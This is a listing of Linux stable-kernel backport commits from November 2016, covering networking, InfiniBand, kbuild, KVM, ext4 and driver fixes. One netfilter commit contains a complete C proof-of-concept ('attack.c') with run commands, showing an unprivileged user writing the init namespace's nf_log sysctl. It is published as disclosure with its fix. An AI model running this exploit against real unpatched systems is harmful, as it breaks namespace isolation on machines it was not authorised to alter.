1. 28 Nov, 2016 17 commits
  2. 24 Nov, 2016 23 commits
    • Nikolay Aleksandrov's avatar
      ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route · 83d83b52
      Nikolay Aleksandrov authored
      [ Upstream commit 2cf75070 ]
      
      Since the commit below the ipmr/ip6mr rtnl_unicast() code uses the portid
      instead of the previous dst_pid which was copied from in_skb's portid.
      Since the skb is new the portid is 0 at that point so the packets are sent
      to the kernel and we get scheduling while atomic or a deadlock (depending
      on where it happens) by trying to acquire rtnl two times.
      Also since this is RTM_GETROUTE, it can be triggered by a normal user.
      
      Here's the sleeping while atomic trace:
      [ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
      [ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
      [ 7858.212881] 2 locks held by swapper/0/0:
      [ 7858.213013]  #0:  (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
      [ 7858.213422]  #1:  (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
      [ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
      [ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
      [ 7858.214108]  0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
      [ 7858.214412]  ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
      [ 7858.214716]  000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
      [ 7858.215251] Call Trace:
      [ 7858.215412]  <IRQ>  [<ffffffff813a7804>] dump_stack+0x85/0xc1
      [ 7858.215662]  [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
      [ 7858.215868]  [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
      [ 7858.216072]  [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
      [ 7858.216279]  [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
      [ 7858.216487]  [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
      [ 7858.216687]  [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
      [ 7858.216900]  [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
      [ 7858.217128]  [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
      [ 7858.217351]  [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
      [ 7858.217581]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217785]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.217990]  [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
      [ 7858.218192]  [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
      [ 7858.218415]  [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
      [ 7858.218656]  [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
      [ 7858.218865]  [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
      [ 7858.219068]  [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
      [ 7858.219269]  [<ffffffff8107a948>] irq_exit+0xb8/0xc0
      [ 7858.219463]  [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
      [ 7858.219678]  [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
      [ 7858.219897]  <EOI>  [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
      [ 7858.220165]  [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
      [ 7858.220373]  [<ffffffff810298e3>] default_idle+0x23/0x190
      [ 7858.220574]  [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
      [ 7858.220790]  [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
      [ 7858.221016]  [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
      [ 7858.221257]  [<ffffffff8164f995>] rest_init+0x135/0x140
      [ 7858.221469]  [<ffffffff81f83014>] start_kernel+0x50e/0x51b
      [ 7858.221670]  [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
      [ 7858.221894]  [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
      [ 7858.222113]  [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a
      
      Fixes: 2942e900 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
      Signed-off-by: default avatarNikolay Aleksandrov <nikolay@cumulusnetworks.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      83d83b52
    • Lance Richardson's avatar
      ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() · 8026beb4
      Lance Richardson authored
      [ Upstream commit db32e4e4 ]
      
      Similar to commit 3be07244 ("ip6_gre: fix flowi6_proto value in
      xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.
      
      Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
      This affected output route lookup for packets sent on an ip6gretap device
      in cases where routing was dependent on the value of flowi6_proto.
      
      Since the correct proto is already set in the tunnel flowi6 template via
      commit 252f3f5a ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
      path."), simply delete the line setting the incorrect flowi6_proto value.
      Suggested-by: default avatarJiri Benc <jbenc@redhat.com>
      Fixes: c12b395a ("gre: Support GRE over IPv6")
      Reviewed-by: default avatarShmulik Ladkani <shmulik.ladkani@gmail.com>
      Signed-off-by: default avatarLance Richardson <lrichard@redhat.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      8026beb4
    • Douglas Caetano dos Santos's avatar
      tcp: fix wrong checksum calculation on MTU probing · 511ad85e
      Douglas Caetano dos Santos authored
      [ Upstream commit 2fe664f1 ]
      
      With TCP MTU probing enabled and offload TX checksumming disabled,
      tcp_mtu_probe() calculated the wrong checksum when a fragment being copied
      into the probe's SKB had an odd length. This was caused by the direct use
      of skb_copy_and_csum_bits() to calculate the checksum, as it pads the
      fragment being copied, if needed. When this fragment was not the last, a
      subsequent call used the previous checksum without considering this
      padding.
      
      The effect was a stale connection in one way, as even retransmissions
      wouldn't solve the problem, because the checksum was never recalculated for
      the full SKB length.
      Signed-off-by: default avatarDouglas Caetano dos Santos <douglascs@taghos.com.br>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      511ad85e
    • Eric Dumazet's avatar
      net: avoid sk_forward_alloc overflows · 1497fd0e
      Eric Dumazet authored
      [ Upstream commit 20c64d5c ]
      
      A malicious TCP receiver, sending SACK, can force the sender to split
      skbs in write queue and increase its memory usage.
      
      Then, when socket is closed and its write queue purged, we might
      overflow sk_forward_alloc (It becomes negative)
      
      sk_mem_reclaim() does nothing in this case, and more than 2GB
      are leaked from TCP perspective (tcp_memory_allocated is not changed)
      
      Then warnings trigger from inet_sock_destruct() and
      sk_stream_kill_queues() seeing a not zero sk_forward_alloc
      
      All TCP stack can be stuck because TCP is under memory pressure.
      
      A simple fix is to preemptively reclaim from sk_mem_uncharge().
      
      This makes sure a socket wont have more than 2 MB forward allocated,
      after burst and idle period.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      1497fd0e
    • Eric Dumazet's avatar
      tcp: fix overflow in __tcp_retransmit_skb() · 85974477
      Eric Dumazet authored
      [ Upstream commit ffb4d6c8 ]
      
      If a TCP socket gets a large write queue, an overflow can happen
      in a test in __tcp_retransmit_skb() preventing all retransmits.
      
      The flow then stalls and resets after timeouts.
      
      Tested:
      
      sysctl -w net.core.wmem_max=1000000000
      netperf -H dest -- -s 1000000000
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      85974477
    • Eric Dumazet's avatar
      net: fix sk_mem_reclaim_partial() · d7f754f8
      Eric Dumazet authored
      commit 1a24e04e upstream.
      
      sk_mem_reclaim_partial() goal is to ensure each socket has
      one SK_MEM_QUANTUM forward allocation. This is needed both for
      performance and better handling of memory pressure situations in
      follow up patches.
      
      SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
      as some arches have 64KB pages.
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      d7f754f8
    • Mark Bloch's avatar
      IB/cm: Mark stale CM id's whenever the mad agent was unregistered · ed453170
      Mark Bloch authored
      commit 9db0ff53 upstream.
      
      When there is a CM id object that has port assigned to it, it means that
      the cm-id asked for the specific port that it should go by it, but if
      that port was removed (hot-unplug event) the cm-id was not updated.
      In order to fix that the port keeps a list of all the cm-id's that are
      planning to go by it, whenever the port is removed it marks all of them
      as invalid.
      
      This commit fixes a kernel panic which happens when running traffic between
      guests and we force reboot a guest mid traffic, it triggers a kernel panic:
      
       Call Trace:
        [<ffffffff815271fa>] ? panic+0xa7/0x16f
        [<ffffffff8152b534>] ? oops_end+0xe4/0x100
        [<ffffffff8104a00b>] ? no_context+0xfb/0x260
        [<ffffffff81084db2>] ? del_timer_sync+0x22/0x30
        [<ffffffff8104a295>] ? __bad_area_nosemaphore+0x125/0x1e0
        [<ffffffff81084240>] ? process_timeout+0x0/0x10
        [<ffffffff8104a363>] ? bad_area_nosemaphore+0x13/0x20
        [<ffffffff8104aabf>] ? __do_page_fault+0x31f/0x480
        [<ffffffff81065df0>] ? default_wake_function+0x0/0x20
        [<ffffffffa0752675>] ? free_msg+0x55/0x70 [mlx5_core]
        [<ffffffffa0753434>] ? cmd_exec+0x124/0x840 [mlx5_core]
        [<ffffffff8105a924>] ? find_busiest_group+0x244/0x9f0
        [<ffffffff8152d45e>] ? do_page_fault+0x3e/0xa0
        [<ffffffff8152a815>] ? page_fault+0x25/0x30
        [<ffffffffa024da25>] ? cm_alloc_msg+0x35/0xc0 [ib_cm]
        [<ffffffffa024e821>] ? ib_send_cm_dreq+0xb1/0x1e0 [ib_cm]
        [<ffffffffa024f836>] ? cm_destroy_id+0x176/0x320 [ib_cm]
        [<ffffffffa024fb00>] ? ib_destroy_cm_id+0x10/0x20 [ib_cm]
        [<ffffffffa034f527>] ? ipoib_cm_free_rx_reap_list+0xa7/0x110 [ib_ipoib]
        [<ffffffffa034f590>] ? ipoib_cm_rx_reap+0x0/0x20 [ib_ipoib]
        [<ffffffffa034f5a5>] ? ipoib_cm_rx_reap+0x15/0x20 [ib_ipoib]
        [<ffffffff81094d20>] ? worker_thread+0x170/0x2a0
        [<ffffffff8109b2a0>] ? autoremove_wake_function+0x0/0x40
        [<ffffffff81094bb0>] ? worker_thread+0x0/0x2a0
        [<ffffffff8109aef6>] ? kthread+0x96/0xa0
        [<ffffffff8100c20a>] ? child_rip+0xa/0x20
        [<ffffffff8109ae60>] ? kthread+0x0/0xa0
        [<ffffffff8100c200>] ? child_rip+0x0/0x20
      
      Fixes: a977049d ("[PATCH] IB: Add the kernel CM implementation")
      Signed-off-by: default avatarMark Bloch <markb@mellanox.com>
      Signed-off-by: default avatarErez Shitrit <erezsh@mellanox.com>
      Reviewed-by: default avatarMaor Gottlieb <maorg@mellanox.com>
      Signed-off-by: default avatarLeon Romanovsky <leon@kernel.org>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      ed453170
    • Tariq Toukan's avatar
      IB/uverbs: Fix leak of XRC target QPs · 81b33083
      Tariq Toukan authored
      commit 5b810a24 upstream.
      
      The real QP is destroyed in case of the ref count reaches zero, but
      for XRC target QPs this call was missed and caused to QP leaks.
      
      Let's call to destroy for all flows.
      
      Fixes: 0e0ec7e0 ('RDMA/core: Export ib_open_qp() to share XRC...')
      Signed-off-by: default avatarTariq Toukan <tariqt@mellanox.com>
      Signed-off-by: default avatarNoa Osherovich <noaos@mellanox.com>
      Signed-off-by: default avatarLeon Romanovsky <leon@kernel.org>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      81b33083
    • Eli Cohen's avatar
      IB/mlx5: Fix fatal error dispatching · a6f56e55
      Eli Cohen authored
      commit dbaaff2a upstream.
      
      When an internal error condition is detected, make sure to set the
      device inactive after dispatching the event so ULPs can get a
      notification of this event.
      
      Fixes: e126ba97 ('mlx5: Add driver for Mellanox Connect-IB adapters')
      Signed-off-by: default avatarEli Cohen <eli@mellanox.com>
      Signed-off-by: default avatarMaor Gottlieb <maorg@mellanox.com>
      Reviewed-by: default avatarMohamad Haj Yahia <mohamad@mellanox.com>
      Signed-off-by: default avatarLeon Romanovsky <leon@kernel.org>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      a6f56e55
    • Daniel Jurgens's avatar
      IB/mlx5: Use cache line size to select CQE stride · 577f7b9e
      Daniel Jurgens authored
      commit 16b0e069 upstream.
      
      When creating kernel CQs use 128B CQE stride if the
      cache line size is 128B, 64B otherwise.  This prevents
      multiple CQEs from residing in a 128B cache line,
      which can cause retries when there are concurrent
      read and writes in one cache line.
      
      Tested with IPoIB on PPC64, saw ~5% throughput
      improvement.
      
      Fixes: e126ba97 ('mlx5: Add driver for Mellanox Connect-IB adapters')
      Signed-off-by: default avatarDaniel Jurgens <danielj@mellanox.com>
      Signed-off-by: default avatarMaor Gottlieb <maorg@mellanox.com>
      Signed-off-by: default avatarLeon Romanovsky <leon@kernel.org>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      577f7b9e
    • Matan Barak's avatar
      IB/mlx4: Fix create CQ error flow · 3ee9c742
      Matan Barak authored
      commit 593ff73b upstream.
      
      Currently, if ib_copy_to_udata fails, the CQ
      won't be deleted from the radix tree and the HW (HW2SW).
      
      Fixes: 225c7b1f ('IB/mlx4: Add a driver Mellanox ConnectX InfiniBand adapters')
      Signed-off-by: default avatarMatan Barak <matanb@mellanox.com>
      Signed-off-by: default avatarDaniel Jurgens <danielj@mellanox.com>
      Reviewed-by: default avatarMark Bloch <markb@mellanox.com>
      Signed-off-by: default avatarLeon Romanovsky <leon@kernel.org>
      Signed-off-by: default avatarDoug Ledford <dledford@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      3ee9c742
    • Johan Hovold's avatar
      PM / sleep: fix device reference leak in test_suspend · 270202d0
      Johan Hovold authored
      commit ceb75787 upstream.
      
      Make sure to drop the reference taken by class_find_device() after
      opening the RTC device.
      
      Fixes: 77437fd4 (pm: boot time suspend selftest)
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarRafael J. Wysocki <rafael.j.wysocki@intel.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      270202d0
    • Johan Hovold's avatar
      uwb: fix device reference leaks · b0c22e76
      Johan Hovold authored
      commit d6124b40 upstream.
      
      This subsystem consistently fails to drop the device reference taken by
      class_find_device().
      
      Note that some of these lookup functions already take a reference to the
      returned data, while others claim no reference is needed (or does not
      seem need one).
      
      Fixes: 183b9b59 ("uwb: add the UWB stack (core files)")
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      b0c22e76
    • Johan Hovold's avatar
      mfd: core: Fix device reference leak in mfd_clone_cell · 4738e9d2
      Johan Hovold authored
      commit 722f1910 upstream.
      
      Make sure to drop the reference taken by bus_find_device_by_name()
      before returning from mfd_clone_cell().
      
      Fixes: a9bbba99 ("mfd: add platform_device sharing support for mfd")
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarLee Jones <lee.jones@linaro.org>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      4738e9d2
    • Theodore Ts'o's avatar
      ext4: sanity check the block and cluster size at mount time · 27bbc77a
      Theodore Ts'o authored
      commit 8cdf3372 upstream.
      
      If the block size or cluster size is insane, reject the mount.  This
      is important for security reasons (although we shouldn't be just
      depending on this check).
      
      Ref: http://www.securityfocus.com/archive/1/539661
      Ref: https://bugzilla.redhat.com/show_bug.cgi?id=1332506Reported-by: default avatarBorislav Petkov <bp@alien8.de>
      Reported-by: default avatarNikolay Borisov <kernel@kyup.com>
      Signed-off-by: default avatarTheodore Ts'o <tytso@mit.edu>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      27bbc77a
    • Borislav Petkov's avatar
      kbuild: Steal gcc's pie from the very beginning · 1899316d
      Borislav Petkov authored
      commit c6a38553 upstream.
      
      So Sebastian turned off the PIE for kernel builds but that was too late
      - Kbuild.include already uses KBUILD_CFLAGS and trying to disable gcc
      options with, say cc-disable-warning, fails:
      
        gcc -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs
        ...
        -Wno-sign-compare -fno-asynchronous-unwind-tables -Wframe-address -c -x c /dev/null -o .31392.tmp
        /dev/null:1:0: error: code model kernel does not support PIC mode
      
      because that returns an error and we can't disable the warning. For
      example in this case:
      
      KBUILD_CFLAGS   += $(call cc-disable-warning,frame-address,)
      
      which leads to gcc issuing all those warnings again.
      
      So let's turn off PIE/PIC at the earliest possible moment, when we
      declare KBUILD_CFLAGS so that cc-disable-warning picks it up too.
      
      Also, we need the $(call cc-option ...) because -fno-PIE is supported
      since gcc v3.4 and our lowest supported gcc version is 3.2 right now.
      Signed-off-by: default avatarBorislav Petkov <bp@suse.de>
      Cc: Ben Hutchings <ben@decadent.org.uk>
      Cc: Sebastian Andrzej Siewior <bigeasy@linutronix.de>
      Signed-off-by: default avatarMichal Marek <mmarek@suse.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      1899316d
    • Sebastian Andrzej Siewior's avatar
      scripts/has-stack-protector: add -fno-PIE · 1cdca2c7
      Sebastian Andrzej Siewior authored
      commit 82031ea2 upstream.
      
      Adding -no-PIE to the fstack protector check. -no-PIE was introduced
      before -fstack-protector so there is no need for a runtime check.
      
      Without it the build stops:
      |Cannot use CONFIG_CC_STACKPROTECTOR_STRONG: -fstack-protector-strong available but compiler is broken
      
      due to -mcmodel=kernel + -fPIE if -fPIE is enabled by default.
      
      Tagging it stable so it is possible to compile recent stable kernels as
      well.
      Signed-off-by: default avatarSebastian Andrzej Siewior <bigeasy@linutronix.de>
      Signed-off-by: default avatarMichal Marek <mmarek@suse.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      1cdca2c7
    • Sebastian Andrzej Siewior's avatar
      kbuild: add -fno-PIE · a2729c7d
      Sebastian Andrzej Siewior authored
      commit 8ae94224 upstream.
      
      Debian started to build the gcc with -fPIE by default so the kernel
      build ends before it starts properly with:
      |kernel/bounds.c:1:0: error: code model kernel does not support PIC mode
      
      Also add to KBUILD_AFLAGS due to:
      
      |gcc -Wp,-MD,arch/x86/entry/vdso/vdso32/.note.o.d … -mfentry -DCC_USING_FENTRY … vdso/vdso32/note.S
      |arch/x86/entry/vdso/vdso32/note.S:1:0: sorry, unimplemented: -mfentry isn’t supported for 32-bit in combination with -fpic
      
      Tagging it stable so it is possible to compile recent stable kernels as
      well.
      Signed-off-by: default avatarSebastian Andrzej Siewior <bigeasy@linutronix.de>
      Signed-off-by: default avatarMichal Marek <mmarek@suse.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      a2729c7d
    • Oliver Hartkopp's avatar
      can: bcm: fix warning in bcm_connect/proc_register · 9b3ae996
      Oliver Hartkopp authored
      commit deb507f9 upstream.
      
      Andrey Konovalov reported an issue with proc_register in bcm.c.
      As suggested by Cong Wang this patch adds a lock_sock() protection and
      a check for unsuccessful proc_create_data() in bcm_connect().
      
      Reference: http://marc.info/?l=linux-netdev&m=147732648731237Reported-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Suggested-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Signed-off-by: default avatarOliver Hartkopp <socketcan@hartkopp.net>
      Acked-by: default avatarCong Wang <xiyou.wangcong@gmail.com>
      Tested-by: default avatarAndrey Konovalov <andreyknvl@google.com>
      Signed-off-by: default avatarMarc Kleine-Budde <mkl@pengutronix.de>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      9b3ae996
    • Ignacio Alvarado's avatar
      KVM: Disable irq while unregistering user notifier · 2cc109fc
      Ignacio Alvarado authored
      commit 1650b4eb upstream.
      
      Function user_notifier_unregister should be called only once for each
      registered user notifier.
      
      Function kvm_arch_hardware_disable can be executed from an IPI context
      which could cause a race condition with a VCPU returning to user mode
      and attempting to unregister the notifier.
      Signed-off-by: default avatarIgnacio Alvarado <ikalvarado@google.com>
      Fixes: 18863bdd ("KVM: x86 shared msr infrastructure")
      Reviewed-by: default avatarPaolo Bonzini <pbonzini@redhat.com>
      Signed-off-by: default avatarRadim Krčmář <rkrcmar@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      2cc109fc
    • Paolo Bonzini's avatar
      KVM: x86: fix missed SRCU usage in kvm_lapic_set_vapic_addr · 1e34a48a
      Paolo Bonzini authored
      commit 7301d6ab upstream.
      
      Reported by syzkaller:
      
          [ INFO: suspicious RCU usage. ]
          4.9.0-rc4+ #47 Not tainted
          -------------------------------
          ./include/linux/kvm_host.h:536 suspicious rcu_dereference_check() usage!
      
          stack backtrace:
          CPU: 1 PID: 6679 Comm: syz-executor Not tainted 4.9.0-rc4+ #47
          Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
           ffff880039e2f6d0 ffffffff81c2e46b ffff88003e3a5b40 0000000000000000
           0000000000000001 ffffffff83215600 ffff880039e2f700 ffffffff81334ea9
           ffffc9000730b000 0000000000000004 ffff88003c4f8420 ffff88003d3f8000
          Call Trace:
           [<     inline     >] __dump_stack lib/dump_stack.c:15
           [<ffffffff81c2e46b>] dump_stack+0xb3/0x118 lib/dump_stack.c:51
           [<ffffffff81334ea9>] lockdep_rcu_suspicious+0x139/0x180 kernel/locking/lockdep.c:4445
           [<     inline     >] __kvm_memslots include/linux/kvm_host.h:534
           [<     inline     >] kvm_memslots include/linux/kvm_host.h:541
           [<ffffffff8105d6ae>] kvm_gfn_to_hva_cache_init+0xa1e/0xce0 virt/kvm/kvm_main.c:1941
           [<ffffffff8112685d>] kvm_lapic_set_vapic_addr+0xed/0x140 arch/x86/kvm/lapic.c:2217
      Reported-by: default avatarDmitry Vyukov <dvyukov@google.com>
      Fixes: fda4e2e8
      Cc: Andrew Honig <ahonig@google.com>
      Signed-off-by: default avatarPaolo Bonzini <pbonzini@redhat.com>
      Reviewed-by: default avatarDavid Hildenbrand <david@redhat.com>
      Signed-off-by: default avatarRadim Krčmář <rkrcmar@redhat.com>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      1e34a48a
    • Jann Horn's avatar
      netfilter: fix namespace handling in nf_log_proc_dostring · bae05436
      Jann Horn authored
      commit dbb5918c upstream.
      
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: default avatarJann Horn <jann@thejh.net>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      bae05436
    • Fabio Estevam's avatar
      mmc: mxs: Initialize the spinlock prior to using it · 1a13c10f
      Fabio Estevam authored
      commit f91346e8 upstream.
      
      An interrupt may occur right after devm_request_irq() is called and
      prior to the spinlock initialization, leading to a kernel oops,
      as the interrupt handler uses the spinlock.
      
      In order to prevent this problem, move the spinlock initialization
      prior to requesting the interrupts.
      
      Fixes: e4243f13 (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
      Signed-off-by: default avatarFabio Estevam <fabio.estevam@nxp.com>
      Reviewed-by: default avatarMarek Vasut <marex@denx.de>
      Signed-off-by: default avatarUlf Hansson <ulf.hansson@linaro.org>
      Signed-off-by: default avatarJiri Slaby <jslaby@suse.cz>
      1a13c10f